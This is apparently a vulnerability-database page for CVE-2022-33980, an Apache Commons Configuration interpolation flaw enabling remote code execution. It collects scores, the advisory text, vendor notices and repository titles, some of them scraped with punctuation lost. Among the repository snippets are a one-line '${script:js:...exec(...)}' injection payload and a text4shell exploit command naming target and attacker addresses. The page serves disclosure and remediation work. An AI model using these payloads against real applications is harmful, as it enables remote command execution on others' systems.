Published: 06/07/2022 Updated: 08/12/2022

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 670

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing up to and including 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.

Vulnerable Product	Search on Vulmon	Subscribe to Product
apache commons configuration
netapp snapcenter -
debian debian linux 11.0

Debian Bug report logs - #1014960 commons-configuration2: CVE-2022-33980 Package: src:commons-configuration2; Maintainer for src:commons-configuration2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Moritz Mühlenhoff <jmm@inutilorg> Date: Fri, 15 Jul 2022 10:33:06 UTC Severi ...

Apache Commons Configuration, a Java library providing a generic configuration interface, performs variable interpolation, allowing properties to be dynamically evaluated and expanded Starting with version 24 and continuing through 27, the set of default Lookup instances included interpolators that could result in arbitrary code execution or con ...

Synopsis Important: Satellite 613 Release Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update is now available for Red Hat Satellite 613 The release contains anew version of Satellite and important security fixes ...

Synopsis Important: Red Hat AMQ Broker 7101 release and security update Type/Severity Security Advisory: Important Topic Red Hat AMQ Broker 7101 is now available from the Red Hat Customer PortalRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, ...

Synopsis Important: Red Hat Fuse 7111 release and security update Type/Severity Security Advisory: Important Topic A minor version update (from 711 to 7111) is now available for Red Hat Fuse The purpose of this text-only errata is to inform you about the security issues fixed in this releaseRed Hat Product Security has rated this updat ...

Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded The standard format for interpolation is &quot;${prefix:name}&quot;, where &quot;prefix&quot; is used to locate an instance of orgapachecommonsconfiguration2interpolLookup that performs the interpolation ...

CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞

CVE-2022-33980-Apache-Commons-Configuration-RCE

一个java代码审计辅助工具

java_asm_parse: 引言：因为之前看了4ra1n师傅和r2的文章，所以对自动化代码审计很感兴趣。所以自己也跟着两位师傅的文章学习了一下。当学习到污点分析这些内容的时候感觉还是很吃力，所以就自己一边看代码一边自己上手写了一下。感觉单纯只是看的话，还是不能了解整个过程。具体�

POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

CVE-2022-33980 ${script:js:javalangRuntimegetRuntime()exec("calc")}

CVE

CVE-2022-33980 CVE Apache Commons RCE can use url,dns,script key-words to connect any server

text4shell script for text coomons < =1.10 CVE-2022-33980

riskootext4shell text4shell script for text coomons < =110 CVE-2022-33980 La biblioteca Apache Commons Text es una librería alternativa a las funcionalidades nativas del JDK de Java Versiones previas a versión 1100 de apache commons Similar a CVE-2022-33980 python3 text4shellpy -u 192168245111:8080/search?query= -i 192168111186 -p 22

NVD-CWE-noinfo https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s https://security.netapp.com/advisory/ntap-20221028-0015/http://www.openwall.com/lists/oss-security/2022/07/06/5 http://www.openwall.com/lists/oss-security/2022/11/15/4 https://www.debian.org/security/2022/dsa-5290 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014960 https://nvd.nist.gov https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE https://www.debian.org/security/2022/dsa-5290

CVE-2022-33980

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Github Repositories

References

Vulmon Search

About

Products

Connect